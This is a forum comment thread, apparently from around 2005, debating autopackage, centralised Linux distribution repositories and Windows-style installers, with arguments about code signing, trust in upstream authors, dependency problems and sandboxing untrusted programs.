I think all good distributions do I good job of providing all the basic programs that a user needs. Web browser, utility programs, etc. It would be nice to have a good system for those misc programs that aren't included in the distribution. Whether it is autopackage or zero install, I don't know. I don't think it makes that much difference to the user. As long as there is a single "package" to download for a given program.

-matthew

Re:Yes, we need this!!

[zCyl]

Those packages could just as easily be placed in a repository and could be downloaded all at once by an automated facility supplied by the distro.

The autopackaging system is working in the opposite direction of a centralized repository. See here.

You could also read the concept being put forward for upgrades and security updates.

There's nothing wrong with having a standardized package format. (With programs like "alien" we essentially already have this.) But the real meat is in how you deal with dependencies across systems, and with distribution of upgrades and security updates.

Re:Yes, we need this!!

[Master+of+Transhuman]

And the points made are very valid.

However, nothing they say there invalidates my point: that people can continue to use repositories for what they do reasonably well - provide a single point of access.

In fact, most Windows freeware that I use comes down either from the developer site (and I prefer that because I can assess how committed the developer is to his project, and whether or not there is a new version not yet available on the freeware site) or from a download site (which is valuable when the developer Web site is down temporarily or permanently) where I can also assess competing packages for the same function.

There is simply no reason to believe that the same won't occur with packages. It's purely hypothetical that repositories will go away if packages become common. It will come down to a matter of free choice by users and developers - as it should be.

Re:nextgen already here: emerge

[Abcd1234]

Riiight, Gentoo's package system, which is basically a re-implementation of the BSD ports system, is "nextgen"... oh, you fanboys, you're so cuuute!

pkgsrc.org

pkgsrc is better

Filled with these fun extras

Yes, but does it come with stopwatch?

Wrong Paradigm

[user9918277462]

I've said it before and I'll say it again: The Windows model of acquiring and running software from a large number of random third parties is broken. It is fundamentally unsafe and, frankly, archaic in 2005. We do not trade 5.25" floppy disks with BASIC games on them, and we certainly shouldn't be downloading self-extracting installers from sketchy websites anymore, regardless of OS.

The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use. This is something we should be proud of rather than trying to imitate the technically inferior competition.

Re:Wrong Paradigm

[Abcd1234]

Wow... now *that* is an interesting point I'd never considered before. No, I have nothing else to add to this conversation, other than, well put. :)

Re:Wrong Paradigm

[bersl2]

Without a bridge, how do we get even a portion of the change-fearing masses?

Re:Wrong Paradigm

[Steven+Edwards]

If the Windows Paradigm was broken people would not use Windows. Yes there are some things about Windows that suck but MSI and InstallShield installers are not a example. Windows security in most regards does suck but packaging is one of the few things Windows does right. You do know you can sign a package in Windows right? Vendor certificates work, just install any packages from Microsoft or from any other major third party vendor.

I guess you would only be happy if we just pulled everything down from SVN/CVS and built from source.

Re:Wrong Paradigm

[t_allardyce]

Linux is all about choice and like it or not most Windows users are stuck in this method and if they are going to switch to linux they'll want it to be just as easy. When i want some sort of program ill want it now, i don't want to waste time reading man pages, finding dependencies, watching builds or copying and pasting errors into google. Sure i could be downloading any kind of trojan program from a random website, it could delete all my data or try and phone home with my passwords but hell, i live on the edge. Production servers are of course a different matter. Personally i love the OSX way of just dragging an icon out of an archive and into your apps directory. The ideal way is to have distros do all the work like you say, but distros will never have every program - theres always something im gonna want to install that doesn't come in the package or binary that i need, one big autopackaging system is idea.

Re:Wrong Paradigm

[karmaflux]

Bittorrent calls you a liar, buddy. We trade 5.25" floppies in a metaphorical sense constantly. When I develop a program that takes random input and outputs Frank & Earnest cartoons, I don't want to have to wait for some Board of Linux Usage Oversight to give my 5k perl script the Stamp of Approval.

Nobody's trying to copy the Windows paradigm with autopackage. What they're trying to do is break down that barrier to cross-distribution software releasing. Your average desktop user does not want to compile software. Dropping to a terminal, cd pathtoapp, tar -jxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user -- and then how to uninstall? Keep the source directory there forever?

"If they can't compile they should run Windows" is a stupid, backwards attitude, and autopackage is trying to fix it. Relying on upstream content providers is dangerous -- what happens when you disagree with your upstream provider? You have to switch distributions? Pat recently dropped Gnome support for Slackware -- I still run gnome. I do it with a third-party package from dropline. Is that broken? No.

The way to fix the problems you describe is to educate users, not to remove their usage priveleges. Teach people not to install untrusted software -- and teach them how to tell what software to trust! Don't just slap their hand and yell NO.

Re:Wrong Paradigm

[isaks]

If the package is a self extracting installer or a rpm/deb/whatever doesn't make the slightest difference. It all boils down to if you trust the author of the package or not. A major difference with autopackage wrt rpm/deb/whatever is that the upstream software author creates the package, not random packager joe. If you don't trust the author, you shouldn't be using the software, regardless of package format!

Re:Wrong Paradigm

[IamTheRealMike]

I'm afraid your assumption that distributions "authenticate" software is flawed. Hiding a back door in software of any reasonable complexity is not hard, if you're so determined, and no distribution can protect you from that. Think about it: who in their right mind is going to wade through all 100,000 lines of configure script looking for back doors? Not going to happen.

Now what you may mean is spyware, malware etc. But this thinking is also flawed. Spyware and such is designed to make money by piggybacking on proprietary software. Open source software has no need of revenue to keep it alive, therefore no need of spyware - but proprietary software cannot enter most distro repositories because most distros do not distribute commercial software. Therefore they would never get a chance to filter things out anyway.

If you want to filter out malicious software in the decentralised model, you need to do several things:

• Define a policy for what is and is not allowed
• Create a certificate authority heirarchy SSL-style. It should be easy to get a package signing certificate: however, it should also be easy to get kicked off if you violate network policy.
• Have an auto-update mechanism that downloads whitelists of signing keys: if you aren't in the whitelist, the system will give you big honking warnings.

The danger here is that people try to audit code before giving out certificates. That's clearly bong: you can't do that reliably or scalably, and anyway waiting until somebody has violated the network policy and then kick them off rapidly has much the same effect: the OS stays free of "bad" software.

Re:Wrong Paradigm

[schon]

If the Windows Paradigm was broken people would not use Windows.

Yeah, just like if the ActiveX-plugin paradigm was broken, nobody would use IE, right?

Most users have *no* clue if a piece of software is designed incorrectly or not, it has exactly zero bearing on whether the masses use a particular piece of software or not.

Re:Wrong Paradigm

[evvk]

> Yes there are some things about Windows that suck but MSI and InstallShield installers are not a example.

Yes they are. apt-get install is infinitely easier and more convenient.

Re:Wrong Paradigm

You miss the point completely.

Namely, that it is essentially impossible for the average computer user to trust even a small fraction of the third parties responsible for all of the software on her system. Even with modern cryptography thrown into the mix, the overhead associated with collecting public keys, authenticating them through a web of trust and then verifying each and every package is enormous. If you expect average Joe Office Worker or Aunt Tillie to go through all that you are not living in reality.

The only solution is to automate the whole process, which several distributions have either done or are in the process of completing. You seem to be arguing that you implicity trust every person you believe you are downloading software from. That's fine, I'm not so cavalier with my machines.

Re:Wrong Paradigm

[hostguy2004]

What about the BSD Ports system?

Isn't standardizing the installation what Ports was designed for?

Re:Wrong Paradigm

[mattyrobinson69]

I agree with him. I know that everything in debian's repositories or portage, or mandrake cooker, etc are all trustworthy applications verified by the disto maintainers.

The debian team would never include gator (claria??) in their repositories but i know tucows or downloads.com might do.

I prefer portage myself, but am just as happy with apt and wont be going back to a MSI style system in a hurry.

Re:Wrong Paradigm

[bman08]

No. Most of us don't understand the source. It would be insecure to allow us to compile our own software if we couldn't personally audit it. In the end, I think what he's saying is that the whole idea of programmable computing is insecure.

Here's an idea; instead of constantly trying to make your computer trustworthy, just stop trusting it.

Re:Wrong Paradigm

[labratuk]

Bittorrent calls you a liar, buddy. We trade 5.25" floppies in a metaphorical sense constantly.

That's content, not programs. Completely different. And when it's linux iso's They're always the same because they are checked against the hashes. The end result is the same thing as having a very fast ftp.

When I develop a program that takes random input and outputs Frank & Earnest cartoons, I don't want to have to wait for some Board of Linux Usage Oversight to give my 5k perl script the Stamp of Approval.

Then don't. Package it with autopackage, rpm, a tarball, whatever, just beware that users installing it could screw with the way the distro wants things to be done and could mess things up.

Your average desktop user does not want to compile software. Dropping to a terminal, cd pathtoapp, tar -jxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user

Nobody is saying that. Straw man.

What a user can do is use yum, apt, yast, emerge, or a gui tool like synaptic. That's not difficult.

Don't just slap their hand and yell NO.

Nobody's doing that. They're still able to install whatever software they like from wherever they like, but if it causes problems for you, well, I'm probably not going to be able to help you with it buddy.

Re:Wrong Paradigm

[labratuk]

If the Windows Paradigm was broken people would not use Windows.

I'll tell you this now, the packaging system is not the factor that people base their decisions to run windows on.

Yes there are some things about Windows that suck but MSI and InstallShield installers are not a example.

When you are installing from installshield, you're basically saying: 'Hello random executable from the internet (even if you are signed by someone), here, overwrite any of my libraries you'd like, with whatever obscure or customised version you want. Oh, and while you're at it, do whatever you want to my registry...'

I guess you would only be happy if we just pulled everything down from SVN/CVS and built from source.

That's a strawman attack. He didn't say anything like that - in fact it's the complete opposite of what he was arguing.

Re:Wrong Paradigm

The guy he's responding to isn't you. I don't get why you're so insistent that he's making straw man arguments when he's disagreeing with specific comments made by the great-grandparent.

Re:Wrong Paradigm

[abigor]

Er, no. My mom can install Windows software. Nice, descriptive dialogues and buttons for easy clicking. She sure as hell can't use apt-get, and don't get me started on the piece of shit that is Synaptic. Plus, unstable is broken way too often these days. I used Debian for years and years, but now I'm finally abandoning it for greener pastures.

Re:Wrong Paradigm

[Jugalator]

We do not trade 5.25" floppy disks with BASIC games on them

Uh, no, but ISO images for both CD's and DVD's with C++ applications and movies on them. And people get sued for it a lot.

Re:Wrong Paradigm

[Jugalator]

That's content, not programs. Completely different.

What do you mean with "content"? Files acquired from BitTorrent can be like any other program installer acquired via a floppy disk. It can be executables (and often is), script files, whatever. What's the difference?

Re:Wrong Paradigm

[k8to]

So tell me then.

How does autopackage allow me to authenticate that the provider of the autopackage is in fact the upstream software author Trustworthy Tim, and not Evil Patrick the Spyware Maven?

In case this isn't clear enough, assume that the upstream author Trustworthy Tim has never heard of or considered using autopackage.

Re:Wrong Paradigm

[k8to]

So do you have a workable key signing system in place which is proven in the field?

Re:Wrong Paradigm

[ferratus]

I don't think MSI or InstallShields (or any other Windows installer for that matter) are broken, but I do agree with the parent post in that the way to *get* the software on windows is not all that good.

If there's one thing I love about Linux is the way I can download/install a software using a single command (or a GUI tool) in most distros.

Even Gentoo, not exactly regarded as the most user friendly distro, allows one to download & install a software by doing:

emerge XYZ

That's it. Same goes for Mandrake, Debian, Fedora, etc. End-user distros like Linspire even go further by allowing you to browse through all available software, look up the description and then perform a "one-click" install.

I think that's great, and a whole lot better than the windows (and mac os x) alternative where you have to look for software on the web, try to see if they contain malware, download them, run the installer, etc.

One of the advantage of the system is that the upstream provider (i.e. usually your distro) checks the package for validity. The packages you download won't contain virii or spyware (even if those were to exist on Linux) because the provider would likely not allow them...something MS would certainly do if they controlled the software ppl are downloading.

I know some packages are hard to install (Gnome for example) but for the most part, I feel software installation is a lot easier on Linux than on Windows, unless you go the CVS/SVN route and compile everything yourself.

At least on Mac OS X, you usually simply drag and drop the Application in the Applications folder and that's it. While not perfect, it's a whole lot better than Windows.

Re:Wrong Paradigm

[isaks]

The same way you would authenticate the provider of the source tarball. Ideally they will be downloaded from the same server. If Trustworthy Tim doesn't want to use autopackage, you - as a user of his software - will have to convince him.

Re:Wrong Paradigm

Security should not come from some kind of trust but from the OS. A program should never be able to do something the user didn't specifically allow. When the user install a program, the installer should ask permission for what it needs and then the OS should show what the application want to do at a very fine grained level and ask if it's ok (if the user trust the application, he could simply click OK without checking). Right now, the problem is the OS security model which is completely flawed.

Re:Wrong Paradigm

[IamTheRealMike]

No. If you're aware of any Linux software that's currently shipping with malicious code let me know and it'll go up the priority list. Mirror cracking and so on is already dealt with by using GPG signatures as the Gaim autopackage does.

Re:Wrong Paradigm

Ever heard of spyware/bundled software? I think that's a problem.

Re:Wrong Paradigm

[Stonehand]

Authenticating isn't really meaningful without code audits and rigorous regression testing.

Do Alan Cox and Linus Torvalds authenticate users who send patches for the Linux kernel? Yes. They've been gatekeepers. Random code doesn't get it.

Has, say, the 2.6 branch been a minefield? Were their stretches of the "stable" 2.4 branch which had nasty bugs? Are their considerable numbers of authentic but broken packages in distributions? Yes; look at how many fixes they need to push out for *official* *authentic* packages in each distribution. I'm not talking feature updates; I'm talking fixes.

If you want it to actually -work- well, you have to take your damn time and test it. This works better in a centralized BSD-style system where packages are authenticated /and/ tested. Hell, OpenBSD even preemptively audits code. Yes, they aim for six months between releases -- but six months of a stable, functioning, secure system is better than continually updating a broken system full of incompatible parts because developers push out entirely authentic but broken or mutually exclusive packages.

Re:Wrong Paradigm

[Devil]

The real problem is not the Windows Installer, I think, but the UN-installer. I'm for easy installation systems just so long as they leave NO TRACES BEHIND when I uninstall, with the possible exception of a settings file in my home directory.

The problem with the Windows Installer system is that an uninstall is not just a reversal of copying files, but that so many registry entries are left behind. Pretty soon, your registry is totally polluted with orphaned values and it's time to nuke-and-pave all over again.

Here's what we need from programs:
# Easy installation
# Complete removal of the program and all registry values upon un-installation.
# If data must be left behind, leave it in a .appname folder, so a user can completely expunge it if she so desires.

Re:Wrong Paradigm

The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use. This is something we should be proud of rather than trying to imitate the technically inferior competition.

The current Linux model introduces a huge barrier to entry.

Developers writing for Windows or MacOS can just release their program, and users will be able to use it. Developers writing for Linux must beg dozens of seperate distributions to include their program, or have their users limited to the handful who are prepared to go to the considerable effort required to install software that is not a part of their distro.

Free software was supposed to empower developers. Instead, it is alienating them.

Free software was supposed to ensure that people retained the right to choose what software they use. Instead, it has created a system where the elite choose what software they consider suitable for the masses to use.

One of the most common arguments people use against switching to Linux is that it doesn't have the software they want. And, for as long as it is incredibly difficult for the average developer to get their software made available on Linux, it will remain that way.

Re:Wrong Paradigm

[Canordis]

If the Windows Paradigm was broken people would not use Windows.

"Eat shit, thousands of flies can't be wrong!" Fallacious bullshit. Just because millions of "technically challenged" people use windows every day, doesen't meant it's better than Unix, specially not conceptually. The Windows installation system works, but at the cost of a bloated, buggy, useless registry, and DLLs that are repeated endlessly...

Re:Wrong Paradigm

"Free software was supposed to empower developers."

Incorrect. Free software is intended to empower users, with the side effect that it often empowers developers as well since the two groups greatly overlap.

I disagree with your core argument that it is difficult to get software distributed. If you write a tool that fills a need it will be distributed and used. The nice thing about Linux is that you the developer won't have to all the legwork of getting it to work everywhere. Release a tarball on sourceforge and let everybody else do the work of building, distributing, integrating and supporting it.

Re:Wrong Paradigm

[man_of_mr_e]

So what you're saying then is that a Linux user must evaluate every bit of software they need, now and in the future prior to distro selection and should use software availability as the primary factor when choosing a distro?

I mean, if you can only get your software from the distro vendor, then you'll have to switch vendors if they don't offer the software you might need in 6 months.

(For the context impaired, I know you can always install software from tarball or third party package, but the person i'm responding to is implying that this is a bad thing and should be prevented).

Re:Wrong Paradigm

[macshit]

Er, no. My mom can install Windows software. Nice, descriptive dialogues and buttons for easy clicking. She sure as hell can't use apt-get

Oh for god's sake, she can too.

sudo aptitude install package

Ooooh that was hard!

[Be nice and give her an alias apt='sudo aptitude']

Re:Wrong Paradigm

[Master+of+Transhuman]

"The debian team would never include gator (claria??) in their repositories but i know tucows or downloads.com might do."

Excuse me, but it is my impression that most of the freeware download sites WILL specify if spyware has been included in the software - once they are made aware of that.

I have NEVER gotten spyware, trojans or viruses from ANY freeware download - and I have TONS of them.

People who use freeware - such as those on alt.comp.freeware - are VERY picky about their freeware being free of crap. Any freeware that picks up crap is dumped on fast.

The problem is not freeware, but pointless idiot programs created by commercial entities and downloaded by idiots that don't know much better and much safer stuff is available at reputable freeware download sites like pricelessware.com.

Re:Wrong Paradigm

[imkonen]

Really? Emphasis on authenticating, huh? Isn't this what Microsoft wants to do with trusted computing? I thought that was on the list of officially recognized BAD THINGS here at slashdot?

Re:Wrong Paradigm

[Master+of+Transhuman]

Complete bullshit.

None of the security problems on Windows comes from the overall method of software distribution.

I have downloaded TONS of freeware programs - from recognized freeware sites that DO TEST their software for viruses and spyware and on the recommendation of OTHER USERS who USE that software and check for the existence of spyware.

In fact, freeware sites have been doing this since back in the BBS days.

I have NEVER had a spyware/trojan/virus problem with Windows freeware. Even with the few ad-ware programs I have used in the past.

None of the security ease of Linux comes from having distros distribute the software. It comes ENTIRELY from the fact that OSS is not commercial and has no motivation to install spyware.

This entire concept that software distribution has significant security concerns is entirely bogus - because it takes place in a community context and anybody distributing malware is detected very quickly.

The ENTIRE problem with spyware and other malware comes from malicious WEB SITES and also from people downloading pointless, stupid little "free" programs from COMMERCIAL entities. If users were made more aware of the legitimate freeware sites where much better freeware was available, they would be less inclined to download anything they see thrust at them.

This is a user education issue - not a software distribution one.

The "wrong paradigm" argument is total nonsense.

Re:Wrong Paradigm

[Julian352]

That is all nice until you find a package that you need that somehow escaped the repository. At that time comes the painful part of finding all the dependencies, installing them and then manually configuring and installing the package. (And don't even ask me how to uninstall)

For example, I needed a swi-prolog installation for a small class project a couple days back. I needed the GUI library, which means the package available in Gentoo (swi-prolog-lite) would not be sufficient. Thus I had to download the .tar.gz and then go through the install steps.

And now, how do I uninstall it,since the Makefiles don't seem to have make remove/uninstall/etc. that would delete the installed binaries.

Linux needs to improve the installer so that I don't have to wait for someone with repository access to create the package for me.

Re:Wrong Paradigm

[NeoChaosX]

Your average desktop user does not want to compile software. Dropping to a terminal, cd pathtoapp, tar -jxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user -- and then how to uninstall? Keep the source directory there forever?

Thank you. I have a knuckleheaded Linux From Scratch-using friend who insists that somehow since Windows users have "learned" to use GUI installers, that they can easily learn how to do what you described on a command line in Linux. He just cannot grasp the idea that not all desktop users can, or want to, compile software, much less know where certain dependencies are located if ./configure can't find them. Don't even ask him about his opinion on GUIs in general.

This is where Autopackage comes in. I love the idea of Autopackage; one package that can be installed on all distros without any trouble, without worrying that Distro X installs GTK in /usr/lib, but Distro Y installs it in /usr/local/lib and having to add some lengthy, hard-to-remember option to ./configure. This makes installing apps on Linux easier, and thus can make Linux more attractive to the less technically-inclined.

Re:Wrong Paradigm

[mattkinabrewmindspri]

Sounds exactly like the way Mac OS X handles things. You install by dragging the application's icon to /Applications, and you uninstall by dragging the application's icon to the trash. The only thing that may be left behind would be a preferences file, in ~/Library/Preferences, or a preferences folder in ~/Library/Application\ Support.

-and no registry.

Re:Wrong Paradigm

[jez9999]

One of the advantage of the system is that the upstream provider (i.e. usually your distro) checks the package for validity. The packages you download won't contain virii or spyware (even if those were to exist on Linux) because the provider would likely not allow them...something MS would certainly do if they controlled the software ppl are downloading.
There seems to be a rather fatal error in this philosophy - it costs money, serious money, for providers to be constantly checking software packages and providing bandwidth for all users to download and install these pieces of software. Linux is free (beer), right? Oh, you mean it's free UNLESS I want to have ease of use, in which case I have to start paying, which is kinda sucky?

Yeah, there might be some distroes offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach. It seems more feasible to me to design a software installation system that allows easy installation, yet downloading from anywhere on the web.

Re:Wrong Paradigm

[korbin_dallas]

No, they are broken! Not in the fundamental copying of files, but in the fundamental way that dlls are versioned. In DLLs proper versioning is developer dependant. Woe to you if your vendor screws up the version label. This same flaw exists in linux installs (and RPM in particular) but at the user side. Oddly the only process that will actually check lib versions is autoconfig, and only if the developer specs those rules.

MSI and InstallShield can do nothing to prevent DLL HELL. in fact these products often require the developer to do some awful wicked manual testing of various dlls to make sure the right ones are in place.

I know I did 10 years of VB and vb installs. I worked at one of the many companies writing windows install software.

For the most part, linux is way better, even with crummy install tools.

Re:Wrong Paradigm

[internic]

I don't know much technical detail about software packaging, either in Windows or Linux, so I can only speak based upon my experience. My experience has been that package management in Linux is much preferable to Windows. When I used Windows 2000, I would often install software that later could not be fully or completely uninstalled (broken uninstall), and often software that was installed would make undesirable and unauthorized changes to settings like file associations. I'm not talking about malware here, just legitimate software behaving badly.

Since I've been using Linux, I find that installing packages has predictable results without the unpleasent side effects I mentioned before, and I have yet to have any issues completely removing unneeded software. What's more, installation is generally simpler and more rapid, e.g. apt-get install foo. This was true using both apt-get and urpmi. I won't attempt to claim this is universal, I will only say that it's my experience.

I always throught that in windows the installer what a standalone program that could essentially do whatever it wanted, and uninstallation depended on the good graces of that software. I'm not sure that this is the case, but it seems to fit my experiences. That system always seemed backward to me, because I'd rather that a trusted program on my system perform installation tasks and keep track of them for later removal. This seems to be what happens in apt-get like systems, and it has led to much more desirable results in my case.

Re:Wrong Paradigm

[Hanji]

UNIX nazi time!

tar -jxvf whatever.tar.gz

-j is for bzip2

You want -z (filter through gzip)

Re:Wrong Paradigm

[theLOUDroom]

If the Windows Paradigm was broken people would not use Windows. Yes there are some things about Windows that suck but MSI and InstallShield installers are not a example.

I'm guessing you've never seen these three letters before: DLL

And then of course there's the nightmare that is the registry...

...or how about all those programs that decide to make themselve fire up at startup without actually showing up in the "starup" group?

Re:Wrong Paradigm

If the Windows Paradigm was broken people would not use Windows.

100,000 lemmings can't be wrong.

Re:Wrong Paradigm

[abigor]

Oh come on. You and I know the meanings of sudo, apt, etc. etc. To her, it's a meaningless stream of characters. A gui is much more intuitive.

And the package names are often cryptic. Look, it works for me (except for the lack of security updates in testing, the broken unstable repository, and all the other stuff that makes Debian suck these days), but there's a reason they invented the gui.

Sorry, this is the truth.

Re:Wrong Paradigm

[mwa]

For example, I needed a swi-prolog installation for a small class project a couple days back. I needed the GUI library, which means the package available in Gentoo (swi-prolog-lite) would not be sufficient. Thus I had to download the .tar.gz and then go through the install steps.

And now, how do I uninstall it,since the Makefiles don't seem to have make remove/uninstall/etc. that would delete the installed binaries.

Checkinstall is what you're looking for. Even for unsupported package management systems you can at least have an inventory of files installed (or changed).

Re:Wrong Paradigm

[Ivan+Todoroski]

When you are installing from installshield, you're basically saying: 'Hello random executable from the internet (even if you are signed by someone), here, overwrite any of my libraries you'd like, with whatever obscure or customised version you want. Oh, and while you're at it, do whatever you want to my registry...'

And how is this different from: 'Hello random package from the repository (even if you are signed by the distro maintainers), here, overwrite any of my libraries you'd like, with whatever obscure or customised version (think distro-specific patches) you want. Oh, and while you're at it, do whatever you want to my /etc (from your postinstall script, running as root)...'

What makes the package maintainers inherently more trustable than the upstream developers who wrote the damn thing in the first place?

Re:Wrong Paradigm

[Minna+Kirai]

If the Windows Paradigm was broken people would not use Windows.

And if tobacco was harmful, people would not smoke cigarettes.

The worldview that "something which even approximately works today never needs to be changed" is a depressing one, and if followed, would've prevent the development of automobiles, airplanes, steamships, etc.

Re:Wrong Paradigm

[Minna+Kirai]

The current Linux model of distros integrating and authenticating software from upstream authors helps ensure the security of the userbase as well as providing installation ease of use.

The Linux model is minorly better than the Windows system, but that's not enough to really deserve pride. ("Vote for me! I'm not as evil as Saddam Hussein!")

Requiring software to be combed over by the distro-team before it makes it to your desktop is error-prone and degrades the progress of software development. The adoption of new and highly superior competitive packages is slowed, because people continue to use whichever one their distro has an existing packaging relationship.

Far better would be a finely-grained choice about trusting a program. Priviledge separate. Today, users can decide only to (a) not execute a program at all, or (b) execute a program with all the rights I have, including reading/writing all my files.

A system akin to the Java "sandbox" should be extended for general program use, so a user can download and execute (for example) a free game demo from an unauthenticated publisher, and be sure it won't compromise her account- and not because a slow, fallable human audited the code, but because the speedy local OS prevented it from touching any resources beyond what it legitimately required

Re:Wrong Paradigm

[Minna+Kirai]

Yeah, there might be some distroes offering this kind of automated package management to even non-paying users now, but I can't see how they can keep that up if people generally take a free-lunch approach.

The first distros to offer that service did it for free, long before "commercial Linux support" became an active marketplace.

However, you have a point. Although that time and effort isn't passed onto users directly (because the volunteers are generous), the fact that they need to spend all that time means (a) the rate their users can get new software is slowed, and more importantly (b) those volunteers are spending their time on maintenance busy-work, instead of REALLY improving the distro.

Re:Wrong Paradigm

[karmaflux]

no, I wanted whatever.tar.bz2. good catch.

Re:Wrong Paradigm

[tepples]

So how would I go about convincing Trustworthy Tim to waste time flipping burgers in order to afford to purchase an annual code-signing certificate?

Re:Wrong Paradigm

[Nailer]

"I'll tell you this now, the packaging system is not the factor that people base their decisions to run windows on."

Agreed.

"When you are installing from installshield, you're basically saying: 'Hello random executable from the internet (even if you are signed by someone), here"

True, but that's only because Microsoft sign any app / activeX control you ask them to. Its not a design flaw (apart from inherently trusting MS), its a human problem.

"overwrite any of my libraries you'd like, with whatever obscure or customised version you want. "

Apps aren't allowed to overwrite system .DLL anymore. Windows protects these files (has since 2K) and its very rare to see apps writing over system libraries these days (the way's it done is a little hacky, letting the apps overwrite the file then overwriting it back to the original, but that's another story).

"Oh, and while you're at it, do whatever you want to my registry...'"

Dunno enough about Windows registr perm,issions to answer that one.

Re:Wrong Paradigm

[tepples]

Vendor certificates work, just install any packages from Microsoft or from any other major third party vendor.

And what for non-major vendors? Which maintainers of lesser-known free software projects can afford rent, food, and the annual fee for a vendor certificate?

Re:Wrong Paradigm

[tepples]

Just because millions of "technically challenged" people use windows every day, doesen't meant it's better than Unix, specially not conceptually.

"Conceptually" doesn't feed your spouse and kids. The Windows method may be poor in theory, but it makes revenue in practice.

Re:Wrong Paradigm

What does sudo mean? What is aptitude? I understand "install". So should I just type that instead of those other strange sounding words? If so, where do I type it? Do I open Open Office and type it in there? Do I type it at the logon prompt? And why is package in italics?

Re:Wrong Paradigm

[sparkz]

And now, how do I uninstall it,since the Makefiles don't seem to have make remove/uninstall/etc. that would delete the installed binaries.

That is what really needs to be addressed: While RPM and other formats allow for the removal of packages (and, often, quite neatly - cleaning up changes to config files). As for non-root installation of software, it can work in many cases, but if you want to install (say) an FTP server, it requires (and should require) root access. If you want to install an Office suite, it shouldn't *require* root acceess (depending on your local policy), and AFAIK, OOo 2 has changed the installation process appropriately, for example. Some stuff does need root access, some stuff doesn't. In a home PC / university / commercial setting, the answers may be different according to the environment, which the software itself cannot contain: Should Foo.pkg be installed by users, or should it need to be installed by "root"? Home/Uni users might be happy with non-root priv's to install it, but a company might not want users to install it. The software can't determine local policy....

Re:Wrong Paradigm

[Taladar]

The more important question is: Why do we care?

Re:Wrong Paradigm

[Taladar]

The reason the GUI was invented is because it sells better (looks better), that doesn't mean it is easiert to use and definitely doesn't mean instructions how to use it are easier to give/write down.

Re:Wrong Paradigm

[Taladar]

The former are the same for every package which is useful to build trust over time.

Re:Wrong Paradigm

[Taladar]

You could simply write an ebuild for it. It isn't much more difficult than doing the ./configure;make;make install yourself. In fact it might be easier since portage provides a rich library of functions to shorten the process. It is even easier if you can copy an existing ebuild of a similar project to start from.

Re:Wrong Paradigm

[Taladar]

And no fixes for bugs in libraries inside the app folders, next please...

Re:Wrong Paradigm

[Taladar]

While in theory I think such a system would be useful it wouldn't help the users needing it most since they are to clueless to use it.

Re:Wrong Paradigm

[Minna+Kirai]

While in theory I think such a system would be useful it wouldn't help the users needing it most since they are to clueless to use it.

Of course, there must be UI guidelines in place so the default behavior is safer than we have now.

For example, assuming a OS-controlled priviledge separation is working to the point where it is ensure that a program can perform high-speed 3d graphics, but not view any of your files, keyboard/mouse input, or screen/sound output from other programs. Then, it would be appropriate for any executable file a user clicks on in a web-browser to be installed that way.

If the program needs more access priviledges (such as to read/write files to directories outside of where it was installed), then the system should display a large, threatening dialog box, "Warning, do you want to allow this, it could be harmful, blah blah, only if you trust this certificate-signer, blah blah". And, at the administrator's option, the user might not even have the ability to hand out those priviledges at all... they would need to wait for the root user to approve the app.

(Naturally, this is a complex subject with many intricate problems. Just because I didn't list them all here doesn't mean the concern is unknown, or there aren't solutions)

Re:Wrong Paradigm

[Julian352]

Unfortunately to write a proper ebuild with the flags (since there's one already with different flags) requires much more than that. The package should have been split into two pieces, as it first requires compilation of the swi-prolog and only after that allows to compile the rest of them. (Or at least that's what the readme said)

The other part was the fact that I needed it done "yesterday" at that time. Someone else already attempted/submitted a partial ebuild and it wasn't yet accepted.

Re:Wrong Paradigm

[novakyu]

And now, how do I uninstall it,since the Makefiles don't seem to have make remove/uninstall/etc. that would delete the installed binaries.

IMHO, this is a non-issue if the install was done carefully. You can simply use --prefix option available in most configure scripts (although, I do have to admit, some packages have this option broken and might need some editing of config/makefiles to get it done) to install everything (yes, everything: binaries, libraries, documentations, config. files, etc.) under a directory, say, /opt/package_name. You can use symlinks for files that have to be in some system-default location. When you are done with the package, just delete the directory---and you can worry about symlinks later, since they don't take space or do anything to interfere with normal operation, and it's trivial to find broken symlinks and delete them from time to time.

And, well, if you don't know about symlinks or passing --prefix=$some_install_dir_like_"/opt/package" to the configure script, and you use *nix, well, you should learn it---it's vastly useful and not that difficult to learn.

Re:Wrong Paradigm

[macshit]

Sure GUIs have a place, but you're confused if you think that every task suddenly becomes obvious when it has a GUI attached. Just like everything else, users must learn how to use a GUI. Nothing is "obvious" [I know this from my own mom, who had great trouble with her new imac and web-browsing -- despite having had previous computer experience using WP to edit stuff and connecting to a dialup.]

So: most people will need to be taught what steps they have to take to install something. For many of them, this will be magic voodoo, GUI or no.

So the effort required to write down and type in a simple command name is not really very different from that to remember you need to do X, Y, and Z from the menus. The effort required to find package file FOO on web is no less than finding out the name "FOO" to type after said command name.

From the point of view of support, the command-line has a giant advantage: you can say "type this" over the phone much more easily than guiding somebody through a graphical application, and/or keeping track of what stuff they've downloaded ("somewhere").

Once they're in a domain-specific app, a GUI can help guide them, but package-installation seems more limited by other tasks which are external to the package manager.

Re:Wrong Paradigm

[jwhitener]

"I'll tell you this now, the packaging system is not the factor that people base their decisions to run windows on."

Actually. For me it is.

I've tried about 6-7 different linux distributions and have never had success installing software. I'll get a couple things installed, then the third breaks something.

Or I'll get most my multimedia stuff installed, then try to upgrade my video driver and it breaks.

Or I'll get an mp3 player installed, and it works, but then I install another multimedia player, and my mp3 breaks.

I have never had a piece of software from a reputable vendor not install in windows. /shrug, maybe I'm just lucky, but the windows msi packages just plain work.

(And while I've heard great things about apt-get and emerge, I've never used them, because not one distribution using those package managers works well with my Radeon x800. Likewise, few, if any, work with a primary sata drive).

Re:Wrong Paradigm

The is pretty much exactly what SELinux does, minus the GUI interface. The only widely-used product that utilizes it is Fedora, and they only use a subset of the capabilities because it such a monumental pain in the ass to configure and debug.

Re:Wrong Paradigm

[Canordis]

One of the main reasons Windows crashes constantly is the conceptual inferiority of it's install system. There's the problem of registry creep, and the lack of user control over WTF is happening to the system. The resulting instability has already cost Microsoft the server markes. And as the Linux and OS X desktops gain market share, people will slowly come together and realize that a computer crashing every day is not normal, despite what Microsoft says.

Re:Wrong Paradigm

[spitzak]

